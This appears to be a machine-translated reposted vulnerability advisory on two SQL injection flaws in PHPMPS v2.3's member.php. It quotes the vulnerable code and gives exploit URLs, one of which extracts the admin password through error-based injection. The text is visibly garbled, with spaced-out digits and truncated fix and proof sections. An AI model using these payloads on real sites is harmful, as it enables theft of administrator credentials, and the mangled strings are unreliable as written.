phpmps_v2. 3 the latest version of the two SQL injection vulnerabilities-vulnerability warning-the black bar safety net

2013-11-19T00:00:00
ID MYHACK58:62201341242
Type myhack58
Reporter My5t3ry@乌云
Modified 2013-11-19T00:00:00

Description

Brief description:

PHPMPS on user-submitted parameters improper handling, leading to multipleSQL injectionvulnerabilities.

Detailed description:

member.php 4 2 2 - 4 5 5

============================================================================================

case 'exchange':

$units = array('gold'=>'medals', 'money'=>'$', 'credit'=>'sub');

$types = array('money'=>'money', 'gold'=>'information currency', 'credit'=>'points');

$notes = array('login'=>'landing points', 'post_info_credit'=>'publish information points' ,'post_comment_credit'=>'comment integration' ,'info_refer'=>'one-key update information' ,'info_top'=>'info sticky' , 'credit2gold'=>'redemption information currency', 'money2gold'=>'funds to purchase information currency');

extract($_REQUEST);

$page = isset($page) ? intval($page) : 1;

$pagesize = 2 0;

$sql = ";

if($type) $sql .= "AND type='$type' ";

if($begindate) {

$begintime = strtotime($begindate.' 0 0:0 0:0 0');

$sql .= "AND addtime>=$begintime ";

}

if($enddate) {

$endtime = strtotime($enddate.' 2 3:5 9:5 9');

$sql .= "AND addtime<=$endtime";

}

$r = $db->getOne("SELECT count(*) as number FROM {$table}pay_exchange WHERE username='$_username' $sql");

$pager['search'] = array('act' => 'exchange');

$pager = get_pager('member.php', $pager['search'], $r, $page, $pagesize);

$exchanges = array();

$result = $db->query("SELECT * FROM {$table}pay_exchange WHERE username='$_username' $sql ORDER BY exchangeid DESC LIMIT $pager[start],$pager[size]");

while($r = $db->rows($result)) {

$r['unit'] = $units[$r['type']];

$r['type'] = $types[$r['type']];

$r['note'] = ! empty($notes[$r['note']]) ? $notes[$r['note']] : $r['note'];

$r['addtime'] = date('Y-m-d h:i:s', $r['addtime']);

$exchanges[] = $r;

}

$seo['title'] = 'transaction details';

include template('member_exchange');

break;

============================================================================================

The above code using extract($_REQUEST);

Cause we can overwrite any variable, by overwriting the variable$table can be constructed of injection

Use as follows:

http://192.168.116.128/phpmps/member.php?act=check_info_gold&table=phpmps_member%20where%2 0 1=1%20and%2 0%28SELECT

%2 0 1%20from%2 0%28select%20count%2 8%2 9,concat%28floor%28rand%2 8 0% 2 92%2 9,

%28substring%2 8%28select%28select%20password%20from%20phpmps_admin%20limit%2 0 0,

1%2 9%29,1,62%2 9%2 9%29a%20from%20information_schema. tables%20group%20by%20a%29b

%2 9% 2 3

SQL vulnerability 2: The

============================================================================================

member.php 7 4 1 - 7 4 6 SQL http://192.168.116.128/phpmps/member.php?act=delete&id[]=1a

============================================================================================

case 'delete':

$id = is_array($_REQUEST['id']) ? join(',', $_REQUEST['id']) : intval($_REQUEST['id']);

if(empty($id))showmsg('not selected record');

$db->query("DELETE FROM {$table}comment WHERE id IN ($id)");

showmsg('deleted successfully', 'member. php? act=info_comment');

break;

============================================================================================

Here did not consider the$id is an array of cases, when you submit an array of time can be injected.

Such as: http://192.168.116.128/phpmps/member.php?act=delete&id[]=1a

Vulnerability to prove:

Repair solutions:

Filtration and...